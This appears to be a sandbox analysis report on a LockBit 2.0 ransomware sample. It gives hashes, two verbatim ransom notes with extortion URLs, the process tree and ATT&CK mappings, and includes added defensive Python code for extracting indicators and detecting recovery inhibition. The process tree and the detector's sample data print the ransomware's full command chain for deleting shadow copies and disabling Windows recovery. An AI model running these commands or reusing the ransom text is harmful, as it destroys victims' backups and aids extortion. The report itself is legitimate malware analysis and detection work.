Analysis

  • max time kernel
    178s
  • max time network
    138s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    20-10-2021 13:04

General

  • Target

    90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe

  • Size

    7.5MB

  • MD5

    ce5d09832339eb7ef86f2c22b4904a20

  • SHA1

    e2db01d0a5572f580f5b7b28b4c9f1a04b35dc06

  • SHA256

    90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446

  • SHA512

    3c6c6dc0943320f151aacdf04bb417fe42454f52b7b5a1cf2a1e8f6c0e57e8d73a1637c90253cbef87815dfc857c118cb1d29f313e2814d1ea30a19789db5d26

Malware Config

Extracted

Path

C:\odt\Restore-My-Files.txt

Ransom Note
LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not pay the ransom You can contact us and decrypt one file for free on these TOR sites http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at Decryption ID: C761DC4A4171AB3069AEF833226BDD9E
URLs

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at

http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion

https://decoding.at

Extracted

Path

C:\Users\Admin\Desktop\LockBit_Ransomware.hta

Ransom Note
Any attempts to restore your files with the thrid-party software will be fatal for your files! To recovery your data and not to allow data leakage, it is possible only through purchase of a private key from us There is only one way to get your files back: Through a standard browser Brave (supports Tor links) FireFox Chrome Edge Opera Open link - https://decoding.at/ Through a Tor Browser - recommended Download Tor Browser - https://www.torproject.org/ and install it. Open one of links in Tor browser and follow instructions on these pages: http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion/or mirrorhttp://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion/These links work only in the Tor browser! Follow the instructions on this page https://decoding.at may be blocked. We recommend using a Tor browser (or Brave) to access the TOR site Do not rename encrypted files. Do not try to decrypt using third party software, it may cause permanent data loss. Decryption of your files with the help of third parties may cause increased price (they add their fee to our). Tor Browser may be blocked in your country or corporate network. Use https://bridges.torproject.org or use Tor Browser over VPN. Tor Browser user manual https://tb-manual.torproject.org/about All your stolen important data will be loaded into our blog if you do not pay ransom. Our blog http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion or https://bigblog.at where you can see data of the companies which refused to pay ransom.
URLs

https://decoding.at/

http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion/

http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion/

https://decoding.at

http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion

https://bigblog.at
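The URL list for the .hta note illustrates a common extraction pitfall: the note lost its line breaks, so a generic URL regex ran "onion/or mirrorhttp://..." together and produced a bogus ".onion/or" entry while missing the second mirror. The extractor below is an added example, not part of this report or of any sandbox tooling. It terminates Tor URLs at the .onion label (56 base32 characters for v3 services, 16 for legacy v2), records clearnet hosts without their paths, pulls the Decryption ID, and defangs everything for a ticket. The torproject.org allowlist is an assumption for this example; the two sample notes are the texts extracted above (the .hta one as an excerpt).

```python
"""Pull onion hosts, clearnet hosts and the Decryption ID out of LockBit 2.0 ransom-note text.

Added example, not part of the sandbox report. The allowlist of benign hosts
(torproject.org) is an assumption for this example.
"""
import re

# v3 onion services are 56 base32 characters, legacy v2 were 16. Stopping at the
# .onion label means a glued 'onion/or mirrorhttp://...' cannot leak into the host.
ONION_RE = re.compile(r"https?://((?:[a-z2-7]{56}|[a-z2-7]{16})\.onion)\b", re.I)
# Clearnet host: scheme, then dotted labels; the path is deliberately not captured.
HOST_RE = re.compile(r"https?://((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)
DECRYPTION_ID_RE = re.compile(r"Decryption ID:\s*([0-9A-F]{32})\b", re.I)

# Hosts a note may legitimately reference that are not attacker infrastructure (assumed list).
ALLOWLISTED_SUFFIXES = ("torproject.org",)


def is_allowlisted(host):
    """Exact match or subdomain of an allowlisted suffix; 'evil-torproject.org' does not qualify."""
    return any(host == s or host.endswith("." + s) for s in ALLOWLISTED_SUFFIXES)


def defang(host):
    """Render a host so it cannot be clicked or auto-linked: 'bigblog.at' -> 'bigblog[.]at'."""
    return host.replace(".", "[.]")


def extract_iocs(note_text):
    """Return sorted onion hosts, sorted clearnet hosts, the first Decryption ID (or None),
    and a defanged list of all hosts."""
    onion = sorted({m.group(1).lower() for m in ONION_RE.finditer(note_text)})
    clearnet = set()
    for m in HOST_RE.finditer(note_text):
        host = m.group(1).lower().rstrip(".")
        if host.endswith(".onion") or is_allowlisted(host):
            continue
        clearnet.add(host)
    ids = DECRYPTION_ID_RE.findall(note_text)
    return {
        "onion_hosts": onion,
        "clearnet_hosts": sorted(clearnet),
        "decryption_id": ids[0].upper() if ids else None,
        "defanged": [defang(h) for h in onion + sorted(clearnet)],
    }


# Sample input: the Restore-My-Files.txt note extracted above, verbatim.
NOTE_TXT = (
    "LockBit 2.0 Ransomware Your data are stolen and encrypted The data will be published on TOR website "
    "http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion and https://bigblog.at if you do not "
    "pay the ransom You can contact us and decrypt one file for free on these TOR sites "
    "http://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion "
    "http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion OR https://decoding.at "
    "Decryption ID: C761DC4A4171AB3069AEF833226BDD9E"
)

# Sample input: excerpt of the LockBit_Ransomware.hta note, keeping the glued 'onion/or mirrorhttp://' run.
NOTE_HTA_EXCERPT = (
    "Open link - https://decoding.at/ Through a Tor Browser - recommended Download Tor Browser - "
    "https://www.torproject.org/ and install it. Open one of links in Tor browser and follow instructions on these pages: "
    "http://lockbitsap2oaqhcun3syvbqt6n5nzt7fqosc6jdlmsfleu3ka4k2did.onion/or "
    "mirrorhttp://lockbitsup4yezcd5enk5unncx3zcy7kw6wllyqmiyhvanjj352jayid.onion/These links work only in the Tor browser! "
    "Use https://bridges.torproject.org or use Tor Browser over VPN. "
    "Our blog http://lockbitapt6vx57t3eeqjofwgcglmutr3a35nygvokja5uuccip4ykyd.onion or https://bigblog.at "
    "where you can see data of the companies which refused to pay ransom."
)

if __name__ == "__main__":
    for name, note in (("Restore-My-Files.txt", NOTE_TXT), ("LockBit_Ransomware.hta", NOTE_HTA_EXCERPT)):
        print(name, extract_iocs(note))
```

Both notes yield the same three onion hosts and the same two clearnet hosts (bigblog.at, decoding.at); only the .txt note carries the Decryption ID, which is the per-victim value worth recording alongside the hosts.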

Signatures

  • Lockbit

    Ransomware family with multiple variants released since late 2019; the notes extracted from this sample identify it as LockBit 2.0.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
  • Executes dropped EXE 2 IoCs
  • Modifies extensions of user files 10 IoCs

    Ransomware generally changes the extension on encrypted files.

  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Loads dropped DLL 4 IoCs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops desktop.ini file(s) 1 IoCs
  • Enumerates connected drives 3 TTPs 1 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 20 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments. In this run the signature fired on taskmgr.exe (PID 768), a top-level process outside the sample's process tree, so it should not be read as anti-analysis behaviour of the sample itself.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Control Panel 2 IoCs
  • Modifies registry class 28 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 50 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe
    "C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1684
    • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
      "C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690 "__IRAFN:C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2481030822-2828258191-1606198294-1000"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      • Modifies registry class
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:3580
      • C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe
        "C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe"
        3⤵
        • Executes dropped EXE
        • Modifies extensions of user files
        • Loads dropped DLL
        • Adds Run key to start application
        • Drops desktop.ini file(s)
        • Enumerates connected drives
        • Drops file in System32 directory
        • Sets desktop wallpaper using registry
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • Drops file in Program Files directory
        • Modifies Control Panel
        • Modifies registry class
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:840
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2784
          • C:\Windows\system32\vssadmin.exe
            vssadmin delete shadows /all /quiet
            5⤵
            • Interacts with shadow copies
            PID:3900
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic shadowcopy delete
            5⤵
            • Suspicious use of AdjustPrivilegeToken
            PID:664
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} bootstatuspolicy ignoreallfailures
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:1688
          • C:\Windows\system32\bcdedit.exe
            bcdedit /set {default} recoveryenabled no
            5⤵
            • Modifies boot configuration data using bcdedit
            PID:3300
        • C:\Windows\SysWOW64\mshta.exe
          "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\Desktop\LockBit_Ransomware.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          4⤵
            PID:2400
  • C:\Windows\system32\taskmgr.exe
    "C:\Windows\system32\taskmgr.exe" /4
    1⤵
    • Drops file in Windows directory
    • Checks SCSI registry key(s)
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    PID:768
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {3eef301f-b596-4c0b-bd92-013beafce793} -Embedding
    1⤵
    PID:2308
  • C:\Windows\System32\rundll32.exe
    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
    1⤵
    PID:1896
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:660
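The cmd.exe chain spawned by sharpsvn.exe (PID 840) is the textbook T1490 sequence: delete shadow copies twice over (vssadmin, then WMI), then turn off Windows recovery with bcdedit. The detection logic below is an added example and not part of this report or of any vendor's rule set. It takes process-creation records (Sysmon Event ID 1 style field names are an assumption; adapt them to your pipeline), splits the cmd.exe chain so the parent's single command line yields the same indicators as its four child processes, and correlates hits by process tree so the finding is attributed to the dropper at the root rather than to four disconnected LOLBin events. The sample records reproduce the tree above with the same PIDs and command lines (irsetup.exe arguments shortened) and add a benign "vssadmin list shadows" tree to show it does not alert.

```python
"""Flag the T1490 'Inhibit System Recovery' chain in process-creation telemetry.

Added example, not part of the sandbox report. Records use Sysmon Event ID 1
style field names (ProcessId, ParentProcessId, Image, CommandLine); that is an
assumption to adapt to your own log schema.
"""
import re

# Indicator regexes applied to a single, un-chained command line.
RECOVERY_INHIBITION_RULES = [
    ("vssadmin_delete_shadows",
     re.compile(r"\bvssadmin(?:\.exe)?\b.*\bdelete\b.*\bshadows\b", re.I)),
    ("wmic_shadowcopy_delete",
     re.compile(r"\bwmic(?:\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("bcdedit_recovery_off",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("bcdedit_ignore_failures",
     re.compile(r"\bbcdedit(?:\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
]

# Optional quoted, fully qualified 'cmd.exe /c' (or /k) prefix.
CMD_PREFIX = re.compile(r'^\s*"?(?:[A-Za-z]:\\[^"]*\\)?cmd(?:\.exe)?"?\s+/[ck]\s+', re.I)
# cmd.exe command separators; '&&' and '||' are tried before a lone '&'.
SEPARATOR = re.compile(r"\s*(?:&&|\|\||&)\s*")


def split_cmd_chain(command_line):
    """Split 'cmd.exe /c a & b & c' into ['a', 'b', 'c']; a plain line comes back as [line]."""
    body = CMD_PREFIX.sub("", command_line, count=1)
    return [p.strip() for p in SEPARATOR.split(body) if p.strip()]


def match_indicators(command_line):
    """Indicator names matched anywhere in the command line, after un-chaining it."""
    hits = set()
    for part in split_cmd_chain(command_line):
        for name, rx in RECOVERY_INHIBITION_RULES:
            if rx.search(part):
                hits.add(name)
    return hits


def root_ancestor(pid, parent_of):
    """Follow ParentProcessId links up to the highest *recorded* process (cycle-safe)."""
    seen = set()
    while pid not in seen and parent_of.get(pid) in parent_of:
        seen.add(pid)
        pid = parent_of[pid]
    return pid


def find_recovery_inhibition(events, min_indicators=2):
    """Group indicator hits by the top of their recorded process tree and report every
    tree showing at least `min_indicators` distinct indicators. Correlating on the tree
    is what ties the vssadmin/wmic/bcdedit children back to sharpsvn.exe and its dropper."""
    parent_of = {e["ProcessId"]: e["ParentProcessId"] for e in events}
    image_of = {e["ProcessId"]: e["Image"] for e in events}
    per_tree = {}
    for e in events:
        hits = match_indicators(e["CommandLine"])
        if hits:
            per_tree.setdefault(root_ancestor(e["ProcessId"], parent_of), set()).update(hits)
    return [
        {"root_pid": root, "root_image": image_of[root],
         "indicators": sorted(hits), "technique": "T1490 Inhibit System Recovery"}
        for root, hits in sorted(per_tree.items())
        if len(hits) >= min_indicators
    ]


def ev(pid, ppid, image, cmd):
    return {"ProcessId": pid, "ParentProcessId": ppid, "Image": image, "CommandLine": cmd}


# Constructed records mirroring the process tree in this report (PIDs as recorded;
# ParentProcessId 4000 stands in for an unrecorded parent such as explorer.exe).
SAMPLE_EVENTS = [
    ev(1684, 4000, r"C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe",
       r'"C:\Users\Admin\AppData\Local\Temp\90af3848d5a0c5eb9c6ddc1ee2e6c539dd6cb5ec5a433d00a6dae22fb221c446.exe"'),
    ev(3580, 1684, r"C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe",
       r'"C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:1798690'),
    ev(840, 3580, r"C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe",
       r'"C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe"'),
    ev(2784, 840, r"C:\Windows\System32\cmd.exe",
       r'"C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete '
       r'& bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no'),
    ev(3900, 2784, r"C:\Windows\system32\vssadmin.exe", "vssadmin delete shadows /all /quiet"),
    ev(664, 2784, r"C:\Windows\System32\Wbem\WMIC.exe", "wmic shadowcopy delete"),
    ev(1688, 2784, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} bootstatuspolicy ignoreallfailures"),
    ev(3300, 2784, r"C:\Windows\system32\bcdedit.exe", "bcdedit /set {default} recoveryenabled no"),
    # Benign, unrelated tree (constructed): an administrator listing, not deleting, shadow copies.
    ev(5000, 4000, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", "powershell.exe"),
    ev(5100, 5000, r"C:\Windows\system32\vssadmin.exe", "vssadmin list shadows /for=C:"),
]

if __name__ == "__main__":
    for finding in find_recovery_inhibition(SAMPLE_EVENTS):
        print(finding)
```

Requiring two distinct indicators per tree keeps a lone scripted "vssadmin delete shadows" from paging anyone; on file servers and backup hosts it is reasonable to run with min_indicators=1, since a single recoveryenabled no or shadow deletion from a binary living under a user profile is already high-fidelity.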

Network

MITRE ATT&CK Matrix (ATT&CK v6)

  Tactic           Technique                           Count  ID
  Persistence      Registry Run Keys / Startup Folder  1      T1060
  Defense Evasion  File Deletion                       2      T1107
  Defense Evasion  Modify Registry                     2      T1112
  Discovery        Query Registry                      3      T1012
  Discovery        Peripheral Device Discovery         2      T1120
  Discovery        System Information Discovery        3      T1082
  Impact           Inhibit System Recovery             3      T1490
  Impact           Defacement                          1      T1491

Downloads

        • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe
          MD5

          ac23d03c4b8d531016a3c1ebfa2bc91c

          SHA1

          11383627d5515ed2257f594db7fbce3a4b9106f8

          SHA256

          0ddd10f3c8a3268237117f08a94c52ead801a76286bb76d0f521b56689801d06

          SHA512

          bb649ab787a05dba410ce43a592b7f122c71f1fdc69bbb8789c57a3e64018189eebb9b46669a2d6a1b156818bb59beed130aeae6e1928108dee16168445659c1

        • C:\Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll
          MD5

          e7a789232ef503dcb4929791673009a3

          SHA1

          8bc28bce4c9d8b4a6e360100441ba54a878de4c1

          SHA256

          89daa79b558055f6f893abf38a0f17d3e1e0193d59dafbdf98d72d4e5961c2a1

          SHA512

          6439a2ec5e9d486c15a37a736bc8d36d8e5f6ecb6a354d0fdd7efc9dccd3fb6bdb208a051b0d81f101669169826e07f9b4ddd79259c79c1e03856af5a9442b87

        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\Guide.pdf
          MD5

          413618ca437d7831df51303188cd207b

          SHA1

          85ea80cfb5db25c756da7ba5992665ea80aee560

          SHA256

          f2d0e13a6ec546f169d45ad5b62ced1bcc3a4e01ae6dc3666239defc959e2baa

          SHA512

          f70dab7aca530bd5013903e050bd974c8ad991c5d8d5ef8b5f6f4efba8acc6d37014b8bc63e3e73679a8229a9e33fd4c0ed3c8b6d5b9628a8735cb32210b30e6

        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\qclp-2.3.dll
          MD5

          852ba853bb6e9fc1476a7907a17be760

          SHA1

          21ef22a3dd2e4b32fbe8f56b7d87510fd9529d5c

          SHA256

          b98b6b7e4ca7f5827d8d5cb34b39a3f4ca8c3dac5d7751d64876d944301084ff

          SHA512

          79bdc1fc374d2cb147237d5e34bc95ba1744ed111d1bd861c28124732e4c179442aec9f7b0ee33d65eef0c9e4eb939d3a5392b9f81cb518ce3ca47ccd86f6c12

        • C:\Users\Admin\AppData\Roaming\SBOP Crystal\sharpsvn.exe
          MD5

          042f1ad45934818427a842170fd8f8f7

          SHA1

          1e689e2ff66ad665a6aecaadff2ccdec68cbe0d4

          SHA256

          1fa7159ab6a545dbaae94e954909cecad354127a2338ce15dea4c79937fd5c7b

          SHA512

          e157f38145ab8dfede75434e5bbd449cf5fb1138103ad062898726e7956cbda12f2b757c050572ec0930b33422c3fc4646f3c75e3324483638492512be77a4c0

        • C:\Users\Admin\Desktop\LockBit_Ransomware.hta
          MD5

          c15c6adc8c923ad87981f289025c37b2

          SHA1

          bfe6533f4afe3255046f7178f289a4c75ad89e76

          SHA256

          90f3a33919fdd766e90fd96f8f20a92c2d1376b7cfdc8b738c2f8e7e6c7498b1

          SHA512

          31dd03b208e00ac012fbe4189d5af1306cc8e3640d40efefab4aa1cabab3c4735eef0cb65e7750c3c77021934e145398e5e26389975cf36b193c8f622a5fde83

        • \Users\Admin\AppData\Local\Temp\_ir_sf_temp_0\lua5.1.dll
          MD5

          e7a789232ef503dcb4929791673009a3

          SHA1

          8bc28bce4c9d8b4a6e360100441ba54a878de4c1

          SHA256

          89daa79b558055f6f893abf38a0f17d3e1e0193d59dafbdf98d72d4e5961c2a1

          SHA512

          6439a2ec5e9d486c15a37a736bc8d36d8e5f6ecb6a354d0fdd7efc9dccd3fb6bdb208a051b0d81f101669169826e07f9b4ddd79259c79c1e03856af5a9442b87

        • \Users\Admin\AppData\Roaming\SBOP Crystal\7-zip.dll
          MD5

          23c651b2ace76d42fec3989bcba3ce7b

          SHA1

          378776d20133f20a4c42476bdcb0a408ef1dce1c

          SHA256

          1b8410f839283a9483369dacdb22290b065ece6f00c026d953024666761532e2

          SHA512

          e47ae720b9ee4388dacfdbf2ba1e2dc546cc01fdb25a6c82ceeeda03801e449f660e97b3bbb6f65b791bfc1566f21187053472022c6c7c0d68f8cf1187326ec8

        • \Users\Admin\AppData\Roaming\SBOP Crystal\Filters\LC.dll
          MD5

          6316c4082cacf8f3f4f22daef56cb15c

          SHA1

          cea3de90b20396b092797ec8c7e241e822c8faed

          SHA256

          5594b08c79a4d188a674713011cd516618fa36d2f988f7d353fb3370939a4062

          SHA512

          e1e0a6440f91b208b61775e30d8fc1be299a298e00ed564ca7c74fa8728738af66e6c3c0805553abbc4a8d2838cd21bfde61ac2322fff4e62ac4d6796a0821bc

        • \Users\Admin\AppData\Roaming\SBOP Crystal\qclp-2.3.dll
          MD5

          852ba853bb6e9fc1476a7907a17be760

          SHA1

          21ef22a3dd2e4b32fbe8f56b7d87510fd9529d5c

          SHA256

          b98b6b7e4ca7f5827d8d5cb34b39a3f4ca8c3dac5d7751d64876d944301084ff

          SHA512

          79bdc1fc374d2cb147237d5e34bc95ba1744ed111d1bd861c28124732e4c179442aec9f7b0ee33d65eef0c9e4eb939d3a5392b9f81cb518ce3ca47ccd86f6c12

        • memory/664-130-0x0000000000000000-mapping.dmp
        • memory/840-122-0x0000000000000000-mapping.dmp
        • memory/1688-131-0x0000000000000000-mapping.dmp
        • memory/2400-134-0x0000000000000000-mapping.dmp
        • memory/2784-128-0x0000000000000000-mapping.dmp
        • memory/3300-132-0x0000000000000000-mapping.dmp
        • memory/3580-115-0x0000000000000000-mapping.dmp
        • memory/3900-129-0x0000000000000000-mapping.dmp